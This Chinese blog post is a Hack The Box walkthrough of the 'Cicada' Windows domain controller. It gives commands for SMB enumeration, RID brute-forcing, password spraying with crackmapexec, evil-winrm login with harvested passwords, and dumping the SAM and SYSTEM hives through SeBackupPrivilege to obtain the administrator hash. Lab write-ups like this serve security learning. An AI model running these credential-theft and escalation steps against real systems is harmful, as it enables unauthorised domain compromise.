首页 > 其他分享 >HTB打靶记录-Cicada

HTB打靶记录-Cicada

时间:2024-10-14 19:15:04浏览次数:7  
标签:HTB Windows 打靶 tcp Cicada password open your

Nmap Scan

nmap扫描一下ip

nmap -sT -sV -O -Pn 10.10.11.35

Nmap scan report for 10.10.11.35
Host is up (0.012s latency).
Not shown: 989 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp?
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-14 16:35:48Z)
110/tcp open  pop3?
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running: Microsoft Windows XP|7|2012, VMware Player
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.91 seconds

smb测试

开放445端口,smbclient连一下

smbclient -L //10.10.11.35

免密登录查看一下HR文件夹

smbclient -N //10.10.11.35/HR

将"Notice from HR.txt"下载下来

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at [email protected].

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

得到一个密码:Cicada$M6Corpb*@Lp#nZp!8

Rid爆破

通过使用默认账户guest爆破rid来探测存在的用户名,这里过滤一下用户

crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute|grep "SidTypeUser"

sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

爆破一下用户

crackmapexec smb 10.10.11.35 -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

得到用户密码: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

enum4linux-ng扫描

使用enum4linux-ng搜集所有与smb服务有关的信息

enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10

得到用户密码: david.orelious:aRt$Lp#7t*VQ!3

连接DEV文件夹

smbclient //10.10.11.35/DEV -U 'david.orelious'

下载Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

用户密码:emily.oscars:Q!3@Lp#M6b*7t*Vt

winrm登录

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35

whoami /all发现开启了SeBackupPrivilegeemily.oscars属于Backup Operators组,说明可以从注册表导出文件,在temp目录下导出sam文件(卡成儿子了

reg save hklm\sam sam.hive
reg save hklm\system system.hive


download sam.hive
download system.hive

卡了半天都没下下来,总之下下来,secretsdumps.py解密拿到administrator的hash,再用evil-winrm登录拿到root.txt

标签:HTB,Windows,打靶,tcp,Cicada,password,open,your
From: https://www.cnblogs.com/F12-blog/p/18464782

相关文章

  • HTB:Jerry[WriteUP]
    目录连接至HTB服务器并启动靶机1.WhichTCPportisopenontheremotehost?2.Whichwebserverisrunningontheremotehost?Lookingfortwowords.3.WhichrelativepathonthewebserverleadstotheWebApplicationManager?4.Whatisthevalidusername......
  • HTB:Lame[WriteUP]
    目录连接至HTB服务器并启动靶机1.Howmanyofthenmaptop1000TCPportsareopenontheremotehost?2.WhatversionofVSFTPdisrunningonLame?3.ThereisafamousbackdoorinVSFTPdversion2.3.4,andaMetasploitmoduletoexploitit.Doesthatexploi......
  • HTB:Legacy[WriteUP]
    目录连接至HTB服务器并启动靶机1.HowmanyTCPportsareopenonLegacy?2.Whatisthe2008CVEIDforavulnerabilityinSMBthatallowsforremotecodeexecution?3.WhatisthenameoftheMetasploitmodulethatexploitsCVE-2008-4250?4.WhenexploitingM......
  • 靶场打靶系列 --- sqli-labs大全
    前提条件1.输入的数据作为sql语句执行了2.输入没有安全过滤3.sql语句根据输入拼接而成的4.在页面中有注入的输出点 我先介绍注入的大致思路0.判断网页逻辑。是否有sql报错,是否有注出点。1.判断注入点。发送特殊符号触发sql报错得知注入点,有’、“、)、无闭合符号。缺点......
  • HTB buff wp
    难度:easy初步端口扫描:开了两个端口,7680没有什么信息,8080是web服务,进去看一下,在concat.php发现版本信息searchsploit搜一下,发现payload,选用48506这个脚本修改一下脚本,不用他给的交互式shell(太难用了),在写入的php文件中加入文件上传功能,弹回来个shell,用msf收一下直接用mu......
  • HTB-TwoMillion 靶机笔记
    TwoMillion靶机笔记概述HTB上的一台liunx靶机,难度定为了简单级别,它包括了对js接口的信息收集,js反混淆,未授权,越权,命令注入等漏洞。一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oports10.10.11.221Nmapscanreportfor10.10.11.221Hostisup(0.37s......
  • HTB-sql基本知识
    HTB-sql基本知识-mysqlsql-插入-insert用于向给定表添加新记录一、语法INSERTINTOtable_nameVALUES(column1_value,column2_value,column3_value,...);上面的语法要求用户填写表中所有列的值。例子:如何向登录表添加新登录名,并为每列添加适当的值。mysql>INSERTI......
  • HTB-sql基本知识
    HTB-sql基本知识-mysqlsql-插入-insert用于向给定表添加新记录一、语法INSERTINTOtable_nameVALUES(column1_value,column2_value,column3_value,...);上面的语法要求用户填写表中所有列的值。例子:如何向登录表添加新登录名,并为每列添加适当的值。mysql>INSERTI......
  • 打靶记录18——narak
    靶机:https://download.vulnhub.com/ha/narak.ova推荐使用VMWare打开靶机难度:中目标:取得root权限+2Flag攻击方法:主机发现端口扫描信息收集密码字典定制爆破密码Webdav漏洞PUT方法上传BF语言解码MOTD注入CVE-2021-3493提权主机发现arp-scan-l尝......
  • 打靶记录 SickOS 1.1
    https://www.vulnhub.com/entry/sickos-11,132/主机发现端口扫描探测存活主机,136是靶机,因为靶机是我最后添加的nmap-sP192.168.75.0/24//StartingNmap7.93(https://nmap.org)at2024-09-2211:36CSTNmapscanreportfor192.168.75.1Hostisup(0.00038sla......